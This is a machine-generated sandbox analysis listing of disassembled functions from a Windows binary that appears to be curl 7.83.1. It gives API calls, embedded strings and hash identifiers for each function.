                                    • Instruction Fuzzy Hash: 5A313936904306AFCB10CFA8C8849E8FBF1EF84304B145569E855B3297DBB2AD85CB90
                                    Function 00E3044E Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E30489
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E30499
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E304A8
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E2A507), ref: 00E304DD
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$malloc
                                    • String ID:
                                    • API String ID: 383369926-0
                                    • Opcode ID: 174dfb0d9db6ccbb380f791d936363415001043ef88328526825b5eca8f7907a
                                    • Instruction ID: cc1c2c06fe9462a92f0f1ef2fbe979884b2f56cd46192851001184c7fe4fdff7
                                    • Opcode Fuzzy Hash: 174dfb0d9db6ccbb380f791d936363415001043ef88328526825b5eca8f7907a
                                    • Instruction Fuzzy Hash: FB115C7610820229DA11593478747B71FC98FC23DDF24345DEAA2B7243E9128E09C260
                                    Function 00E0D323 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                    Download Yara Rule
                                    APIs
                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100), ref: 00E0D370
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0D386
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0D39C
                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100), ref: 00E0D3DF
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrfgets
                                    • String ID:
                                    • API String ID: 4248516992-0
                                    • Opcode ID: 5c1f59a110c70881e11783d400a1b92f398ca74e6037fd2c697ad712816c1b7c
                                    • Instruction ID: 8b78c3b916dcf02e0300725d6c11dedd311ee27443ec58ec34e572363749060a
                                    • Opcode Fuzzy Hash: 5c1f59a110c70881e11783d400a1b92f398ca74e6037fd2c697ad712816c1b7c
                                    • Instruction Fuzzy Hash: 1E21257590831D9ADB24DF65DC41BDAB3A8EF05354F0004EAE585FB181EAB09EC88FA1
                                    Function 00E065D4 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0661C
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E06636
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E06651
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E0666B
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree
                                    • String ID:
                                    • API String ID: 1865132094-0
                                    • Opcode ID: 7fde36ec6e29a00027eff1112e0c2a02c143aa531b0fff05366d7e68c9447d7f
                                    • Instruction ID: fce687a1fe9b69be5d61103c53d63b5bebb3cc742e02b3088f4bfda110a65266
                                    • Opcode Fuzzy Hash: 7fde36ec6e29a00027eff1112e0c2a02c143aa531b0fff05366d7e68c9447d7f
                                    • Instruction Fuzzy Hash: CD217175509782DEC7218F3595447E6BBE0AF56318F282D4EE4D6B72C0CB32D986CB41
                                    Function 00E10EDA Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I32,00000003,?,00E10FFB,?,00000000,766A43D0,?,00E11589,?,?,?,?,00000000), ref: 00E10EE5
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I64,00000003,?,?,?,?,?,?,?,?,?,00000000), ref: 00E10EFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strncmp
                                    • String ID: I32$I64
                                    • API String ID: 1114863663-3980630743
                                    • Opcode ID: 8fffc63a18352887356f1f5574ca7a7ba88da1e3174636b0b9b98e55ac9316e3
                                    • Instruction ID: 2ebc404317881fd48651f50f48a24f5ab47b6fff2b2cccc63d6711491607b3a0
                                    • Opcode Fuzzy Hash: 8fffc63a18352887356f1f5574ca7a7ba88da1e3174636b0b9b98e55ac9316e3
                                    • Instruction Fuzzy Hash: 4F11053AB80143C49A39893D2AEF2EB1A46A60E37C71C36C2DC08F4D69C0C2CEC78043
                                    Function 00E3480B Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00E124A8), ref: 00E34820
                                    • __alldvrm.LIBCMT ref: 00E34839
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E34863
                                    • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00E124A8,00000000), ref: 00E34873
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1296068966-0
                                    • Opcode ID: 76443ef28741f5f607405aa0e5f1e5fa18e122c20ae7a1347fe011ccf10ad295
                                    • Instruction ID: 778099e7caac74c88cb20804c4954d3e7b31583c6fb211d4aa61e608a9eecebb
                                    • Opcode Fuzzy Hash: 76443ef28741f5f607405aa0e5f1e5fa18e122c20ae7a1347fe011ccf10ad295
                                    • Instruction Fuzzy Hash: 5D01C072A05204BFDB059FA5FC91B8B7FF9EB48344F108469F508F62A1D7729A44DB40
                                    Function 00E1027A Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,00E010B6), ref: 00E1028E
                                    • __alldvrm.LIBCMT ref: 00E102A7
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E102D1
                                    • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,00E010B6), ref: 00E102DA
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1296068966-0
                                    • Opcode ID: cb1567f52107c778aa24307ccae0c45a4b3abe3b1ca11ec9b1740f8784ff929f
                                    • Instruction ID: 3ca0b6d827a3b7de0c39f6b3508b6bc7711fdefdb9815501d9aff88ce09dc798
                                    • Opcode Fuzzy Hash: cb1567f52107c778aa24307ccae0c45a4b3abe3b1ca11ec9b1740f8784ff929f
                                    • Instruction Fuzzy Hash: AEF0D172A062047FD7055BE6BC45E9B7AAEE749381F205624F604B6071C6F14E849710
                                    Function 00E27EC3 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E12677: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E27EE5,?,?,?,00E28727,?,?,00000000,?,?,?,00E28849,00000000,?,?), ref: 00E126C4
                                      • Part of subcall function 00E12677: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28849,00000000,?,?,?,00E12373,?,?,?,?,00E016C6,?,00200030), ref: 00E126DF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28849,00000000,?,?,?,00E12373,?,?,?,?,00E016C6,?,00200030), ref: 00E27F33
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$realloc
                                    • String ID: CURL_SSL_BACKEND$xk$xk
                                    • API String ID: 3347955621-4214655078
                                    • Opcode ID: eb0d3236c4a6983bb24c4ee9fff840dfd548854e130128686b5170bd48dea065
                                    • Instruction ID: 437d42ae8e451cf3c3e7cdb3167d8f3d007e6bd101e3b182c31c38f744205b39
                                    • Opcode Fuzzy Hash: eb0d3236c4a6983bb24c4ee9fff840dfd548854e130128686b5170bd48dea065
                                    • Instruction Fuzzy Hash: 1301F43230C272CFAB608B26BD94A2733D5F7843D9714247AE986F3251E6B09C0DC7A0
                                    Function 00E2887E Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00E08BF9,00E28B58,?,00E21E86,?,?,00000000), ref: 00E28889
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E21E86,?,?,00000000), ref: 00E2889F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E21E86,?,?,00000000), ref: 00E288B3
                                    • closesocket.WS2_32(000000FF), ref: 00E288CB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$CriticalDeleteSectionclosesocket
                                    • String ID:
                                    • API String ID: 3086658127-0
                                    • Opcode ID: 92ba3087f2d268585290a4ec97db4492be7956e671de5ef9209c62dd134366e3
                                    • Instruction ID: 38ea770db452669e1e62914abb0ae7b20ac033b313f7df9c7351ce5a9dc76beb
                                    • Opcode Fuzzy Hash: 92ba3087f2d268585290a4ec97db4492be7956e671de5ef9209c62dd134366e3
                                    • Instruction Fuzzy Hash: 5FF06236601912EFCB1D2B12FC1861DBB61FF44762B148139E505721F0DF741C69CB91
                                    Function 00E2603F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200COMMON
                                    Download Yara Rule
                                    APIs
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E26067
                                      • Part of subcall function 00E2E9BE: inet_pton.WS2_32(00000002,?,?), ref: 00E2E9D8
                                      • Part of subcall function 00E2E9BE: inet_pton.WS2_32(00000017,?,?), ref: 00E2E9E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: inet_pton$_time64
                                    • String ID: includesubdomains$max-age=
                                    • API String ID: 868955570-1235841791
                                    • Opcode ID: e01e8406edce4c7cccfe2579ce7436ab54f897a2eff5cec6b13408cec8d2db09
                                    • Instruction ID: c90cc29001ae61ff01f97c21bef62317dc24ef89401f8eed5ffe5e8dad3979da
                                    • Opcode Fuzzy Hash: e01e8406edce4c7cccfe2579ce7436ab54f897a2eff5cec6b13408cec8d2db09
                                    • Instruction Fuzzy Hash: F4514831F422744BDB249A68A8203FEB7E56F66354F2C7219D8D5BB383DA60AC448790
                                    Function 00E1F1BA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E1F255
                                      • Part of subcall function 00E1941D: __alldvrm.LIBCMT ref: 00E19466
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E1F287
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm
                                    • String ID: Connection time-out
                                    • API String ID: 67483490-165637984
                                    • Opcode ID: 056ea495009873869bf0322b4fb9312a907c65883aad324fb7d8ce797e2fdb62
                                    • Instruction ID: 7c7865d7f3625b7f1d6faee5d530ef8ca6addd257484572a4d0eb14092a18734
                                    • Opcode Fuzzy Hash: 056ea495009873869bf0322b4fb9312a907c65883aad324fb7d8ce797e2fdb62
                                    • Instruction Fuzzy Hash: 63518371B04605AFEB18DF699855AEEB7E5FF84710F208139E519EB390DB70A981CBC0
                                    Function 00E29A62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMON
                                    Download Yara Rule
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000003,00000000,00000005), ref: 00E29B94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID: %lx$0kv@qv@/lv
                                    • API String ID: 2918714741-332328434
                                    • Opcode ID: 1f8ebdc167c6fc1c1b547fd406fc1d42ed17b64f2725722b7ff6414efac93fd8
                                    • Instruction ID: 826cc41dcfc118ff4060a40a59b1b123c0c52c34e85964c857ab76c3354cffa0
                                    • Opcode Fuzzy Hash: 1f8ebdc167c6fc1c1b547fd406fc1d42ed17b64f2725722b7ff6414efac93fd8
                                    • Instruction Fuzzy Hash: BD51E832B002698BCF248EBCF8C01AD77E19F85358F257639D4A6FB282E6718C46C744
                                    Function 00E455C7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                    Download Yara Rule
                                    Strings
                                    • SSL/TLS connection timeout, xrefs: 00E457CB
                                    • select/poll on SSL/TLS socket, errno: %d, xrefs: 00E457B9
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                    • API String ID: 0-3791222319
                                    • Opcode ID: fdd89e095e1f95dd3d822718edd0658f08c49796f911cc6af00bc33955e57e2f
                                    • Instruction ID: bedd56ca91165513b001930a6fdc4db18170f2bf3daeb1a141195fb3f5181c55
                                    • Opcode Fuzzy Hash: fdd89e095e1f95dd3d822718edd0658f08c49796f911cc6af00bc33955e57e2f
                                    • Instruction Fuzzy Hash: 94512C36604B42DBDB25DE28F8456BB77D5AB85324F60693EF486E2292D730D8448F41
                                    Function 00E0FF30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E100A4
                                      • Part of subcall function 00E120F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00E08A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00E12101
                                    Strings
                                    • internal error: invalid pattern type (%d), xrefs: 00E10034
                                    • %0*lu, xrefs: 00E10014
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func_strdup
                                    • String ID: %0*lu$internal error: invalid pattern type (%d)
                                    • API String ID: 2404189530-449433499
                                    • Opcode ID: 9c41fa88b864b0fadde907a22463b21c5b151fa54fa06fbbb0d4018a06f5de0b
                                    • Instruction ID: b81bc913124eafb70dfd3cc974051ec309ec31b884c6fc3b2bf7acd182131b01
                                    • Opcode Fuzzy Hash: 9c41fa88b864b0fadde907a22463b21c5b151fa54fa06fbbb0d4018a06f5de0b
                                    • Instruction Fuzzy Hash: 4651D6307042029FCB15DF68C450BF9BBA1AF4A308F2895ADD495AB682D6B2D9C6CB11
                                    Function 00E3C30D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E3C351
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr
                                    • String ID: Content-Length: %I64d$The file does not exist
                                    • API String ID: 601868998-3816122970
                                    • Opcode ID: 2d79e8d47b023e5ddeff214f95b9f36ffb341e3ccf00b354b912741d698324bb
                                    • Instruction ID: 24008077bfe22bd46cb4f54d14dc7e7fce37c9aca19f49806ccbd43ecded9f76
                                    • Opcode Fuzzy Hash: 2d79e8d47b023e5ddeff214f95b9f36ffb341e3ccf00b354b912741d698324bb
                                    • Instruction Fuzzy Hash: B7316E717043009BE620A62CAC95A7F7BDA9FD1324F34652BF465B61C2DE70DC40C3A2
                                    Function 00E3A5F9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,00E3A3DE,?), ref: 00E3A6FF
                                    Strings
                                    • FTP response timeout, xrefs: 00E3A720
                                    • FTP response aborted due to select/poll error: %d, xrefs: 00E3A706
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout
                                    • API String ID: 1452528299-4057338436
                                    • Opcode ID: 317e86e8892b891d57911a1ff98873bee669e9d9d2c29bcc8bae2e8e8ffad6af
                                    • Instruction ID: dbcecb8a08620bfa28e386ad0a001a53f3918cda292ce688fe69c3028ff64a8b
                                    • Opcode Fuzzy Hash: 317e86e8892b891d57911a1ff98873bee669e9d9d2c29bcc8bae2e8e8ffad6af
                                    • Instruction Fuzzy Hash: 2141D770E002069FDB08CB55C85A6AE7BF6BFD4314F2CA179D441B7280E7714E82CB92
                                    Function 00E103E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 00E104E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fputs
                                    • String ID: "%s":$"%s":null
                                    • API String ID: 1795875747-2759546026
                                    • Opcode ID: 719ee8139b209a619be5e917d102fe310a123b2fecafb84cac8fcc548fa3e007
                                    • Instruction ID: d4a121dd1545d8fc13afcda21bd70d10f3a4fca56a38ad91039ad80e60aa708c
                                    • Opcode Fuzzy Hash: 719ee8139b209a619be5e917d102fe310a123b2fecafb84cac8fcc548fa3e007
                                    • Instruction Fuzzy Hash: 0931CB70A00306EFDF25CF55C981AEA77E5EF54344F18A059EA25AB210E3B0EED0DB50
                                    Function 00E2E46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E2E34A: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,766B1980,00000000,?,?,00E2E7A2,?), ref: 00E2E37D
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 00E2E523
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _time64tolower
                                    • String ID: Hostname in DNS cache was stale, zapped$|l
                                    • API String ID: 3062723450-2246359128
                                    • Opcode ID: 5edad00f672ee5ed6335a58498570d3cb47fd3754edafb707239003805880176
